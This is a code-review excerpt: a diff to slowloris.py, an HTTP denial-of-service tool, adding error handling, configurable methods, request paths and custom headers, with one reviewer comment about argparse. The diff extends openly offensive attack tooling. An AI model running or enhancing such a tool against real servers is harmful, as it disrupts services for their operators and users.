slowloris.py

```diff
@@ -157,18 +117,37 @@ def init_socket(ip: str):
         ctx.verify_mode = ssl.CERT_NONE
         s = ctx.wrap_socket(s, server_hostname=args.host)
 
-    s.connect((ip, args.port))
+    try:
+        s.connect((ip, port))
+    except socket.error as e:
+        logging.error("Failed to connect to %s:%s - %s", ip, port, e)
+        sys.exit(1)
 
-    s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
+    request_path = "/" if args.attack_pattern == "default" else generate_custom_path()
+    
+    s.send_line(f"{args.method} {request_path} HTTP/1.1")
 
     ua = user_agents[0]
     if args.randuseragent:
         ua = random.choice(user_agents)
 
     s.send_header("User-Agent", ua)
     s.send_header("Accept-language", "en-US,en,q=0.5")
+    if args.headers:
+        custom_headers = args.headers.split(',')
```

Comment:
This is ugly and difficult to use. Can't argparse support passing multiple headers instead of comma-separated?